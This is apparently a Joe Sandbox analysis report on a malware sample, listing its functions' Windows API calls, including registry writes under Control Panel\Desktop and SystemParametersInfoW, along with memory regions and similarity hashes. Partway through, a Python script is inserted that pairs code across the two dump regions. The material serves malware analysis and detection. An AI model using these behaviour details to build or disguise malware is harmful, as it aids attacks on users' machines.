                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: 1050865b8f551beb30e40799f8e93d2cdd75059be690525d97bedd8af62775e7
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: 83318AB6900609CFDB10DF99C884AAEBBF9FF08324F25404AD841A7311D775EA49CBA4
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0079BED3
                                                                                  • Part of subcall function 00792939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                  • Part of subcall function 00792939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                  • Part of subcall function 00792939: RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 4127273184-27424756
                                                                                • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                • Instruction ID: fbaafb40d9f4e4c9227fd9c354fa1ac9e14d715fae2d5b63f4878dc34074c465
                                                                                • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                • Instruction Fuzzy Hash: CD114532B8061072DD1530396E1FBAE2806D756B61FA4011AF7027A7D7EBCF4A9103DB
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0079BED3
                                                                                  • Part of subcall function 00792939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                  • Part of subcall function 00792939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                  • Part of subcall function 00792939: RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 4127273184-27424756
                                                                                • Opcode ID: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                • Instruction ID: d41e2ef67cb7ae722a7a453767fee0db039d49c46c2664c1f3fac367ec9dbbee
                                                                                • Opcode Fuzzy Hash: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                                • Instruction Fuzzy Hash: 21F0BB33B8012472DD29357D7F1FBEE1909D786B21F640115F302653E6E78E454242D7
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID: GetLocaleInfoEx
                                                                                • API String ID: 2299586839-2904428671
                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                • Instruction ID: a2dac39e51a7491db2a03eeffe0373b212b4c54ed18a8f239fa38ca71f542fd3
                                                                                • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                • Instruction Fuzzy Hash: D6022C71E002199BDF14CFA9C880BADBBB1FF89314F65826ED919E7341D735AA41CB90
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007D2334,?,?,00000008,?,?,007D5679,00000000), ref: 007D2566
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction ID: d78d38d92fbb9a63f0155b325a315c37c49b980a3bf44fcc2ddf19cf9ca9cb74
                                                                                • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                • Instruction Fuzzy Hash: D4B13B316106089FD715CF28C49AB657BB0FF55364F298699E89ACF3A2C339D993CB40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction ID: f09a69a2e3a1e57d23e299bd26508967d2686387badcec475e648cc3631c1b85
                                                                                • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                • Instruction Fuzzy Hash: 7A02A17270D3009BD714EF29D952B6FB3E1BFCC754F15492DF4859B282EE78A8068A42
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                • String ID:
                                                                                • API String ID: 1663032902-0
                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C7185
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C7192
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007D1375
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                • String ID:
                                                                                • API String ID: 1663032902-0
                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction ID: 859d3c6db4150c2e0ac1c646dbc840118b78799fc3b219d860e5292f0148343b
                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                • Instruction Fuzzy Hash: B721AF72914206EBDB289A29EC45BBA73B8EF44310F54417BFD01C6A82EB78DD40CB50
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                • String ID:
                                                                                • API String ID: 2692324296-0
                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007D12EF,00000000,00000000,?), ref: 007D157D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                • String ID:
                                                                                • API String ID: 2692324296-0
                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction ID: 6840559b9b7556bab9da7b0c246afba46e27d67fb01d2df43995b52f81685813
                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                • Instruction Fuzzy Hash: 99F0FE32604115BBDB2496149D05BBA7B78EB80314F44056AEC07A3640EA7CFD51C6D0
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 007D1090
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction ID: 47a400dbba32b5cbbb74b2bba91cd2121f2abc247924fa71adb0c877675760d1
                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction Fuzzy Hash: 69F04C323003046FDB246F359C95B7A7BA1EFC0358F45803DF90187780D6759C42C650
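The two entries above with Opcode ID 39b6845e… (one from the PE-backed dump at 0x00400000, one from the non-PE region at 0x00780000) carry the same EnumSystemLocalesW call with its ref shifted by a constant, and the 0x00780000 copy still passes the callback address 004510BA from the original image; the RaiseException pair earlier in the listing shows the same shift. The script below is an added example, not part of the Joe Sandbox report: it parses this listing format (the APIs, Memory Dump Source and Similarity fields), pairs functions across the two regions by Opcode ID, computes the per-call relocation delta, and flags arguments in the 0x00780000 copy that still point into the 0x00400000 image. The sample text is copied from the entries above, and the 0x00480000 upper bound used for the image is an assumption (the report does not state the image size).

```python
"""Pair function entries from the two memory-dump regions by Opcode ID.

Added example, not part of the Joe Sandbox report. It parses the function
listing format above and checks whether the functions dumped from the
non-PE region at 0x00780000 are the same code as the PE-backed image at
0x00400000, laid out at a constant shift.
"""
import re
from collections import defaultdict

# Constructed sample: four entries copied from the listing above, trimmed to
# the fields the parser uses.
SAMPLE = """\
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionRaise
• Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007D2334,?,?,00000008,?,?,007D5679,00000000), ref: 007D2566
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Similarity
• API ID: ExceptionRaise
• Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
• EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
Memory Dump Source
• Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
APIs
  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
• EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 007D1090
Memory Dump Source
• Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
"""

# Direct API calls of the function itself. "Part of subcall function" lines are
# indented and deliberately not matched: they describe callees, not this function.
API_RE = re.compile(r"^• (\w+)\.\w+\((.*)\), ref: ([0-9A-F]{8})$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-F]{8}), based on PE: (true|false)")
OPCODE_RE = re.compile(r"^• Opcode ID: ([0-9a-f]{64})$")


def parse_entries(text):
    """Return one dict per function entry: opcode_id, region, pe_backed, calls."""
    entries, cur = [], {"calls": []}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            api, args, ref = m.groups()
            cur["calls"].append((api, args.split(","), int(ref, 16)))
            continue
        m = OFFSET_RE.search(line)
        if m:
            cur["region"] = int(m.group(1), 16)
            cur["pe_backed"] = m.group(2) == "true"
            continue
        m = OPCODE_RE.match(line)
        if m:  # the Opcode ID line closes an entry
            cur["opcode_id"] = m.group(1)
            entries.append(cur)
            cur = {"calls": []}
    return entries


def relocation_deltas(entries, pe_base=0x00400000, copy_base=0x00780000):
    """For each Opcode ID present in both regions, the set of (copy_ref - pe_ref)
    over the direct API call sites, matched by API name and order. A single
    value across all pairs means the copy is the same code at a constant shift."""
    by_opcode = defaultdict(dict)
    for e in entries:
        by_opcode[e["opcode_id"]][e["region"]] = e
    deltas = {}
    for opcode_id, regions in by_opcode.items():
        if pe_base in regions and copy_base in regions:
            pairs = zip(regions[pe_base]["calls"], regions[copy_base]["calls"])
            deltas[opcode_id] = {c_ref - p_ref
                                 for (p_api, _, p_ref), (c_api, _, c_ref) in pairs
                                 if p_api == c_api}
    return deltas


def stale_image_pointers(entries, pe_base=0x00400000, pe_end=0x00480000,
                         copy_base=0x00780000):
    """Arguments in the copy at copy_base that still fall inside the original
    image. pe_end is an assumption: the report gives no image size, only
    associated dumps up to 0x476000."""
    stale = []
    for e in entries:
        if e["region"] != copy_base:
            continue
        for api, args, ref in e["calls"]:
            for a in args:
                if re.fullmatch(r"[0-9A-F]{8}", a) and pe_base <= int(a, 16) < pe_end:
                    stale.append((api, ref, a))
    return stale


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for oid, d in relocation_deltas(ents).items():
        print(oid[:16], sorted(hex(x) for x in d))
    for api, ref, arg in stale_image_pointers(ents):
        print(f"{api} @ {ref:08X} still passes {arg} (inside the 0x400000 image)")
```

Run against the full listing, the delta set per Opcode ID should stay a single value; a second value, or a pointer argument the copy never rebased, is the kind of detail that tells a 0x00780000-style region apart from a cleanly relocated module.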
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,007C39B1,?,00000004), ref: 007C7851
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction ID: 6f6cb49ee0c271d648559e2e8dea67467d7d7896ae317e3e1b12f975f336001d
                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
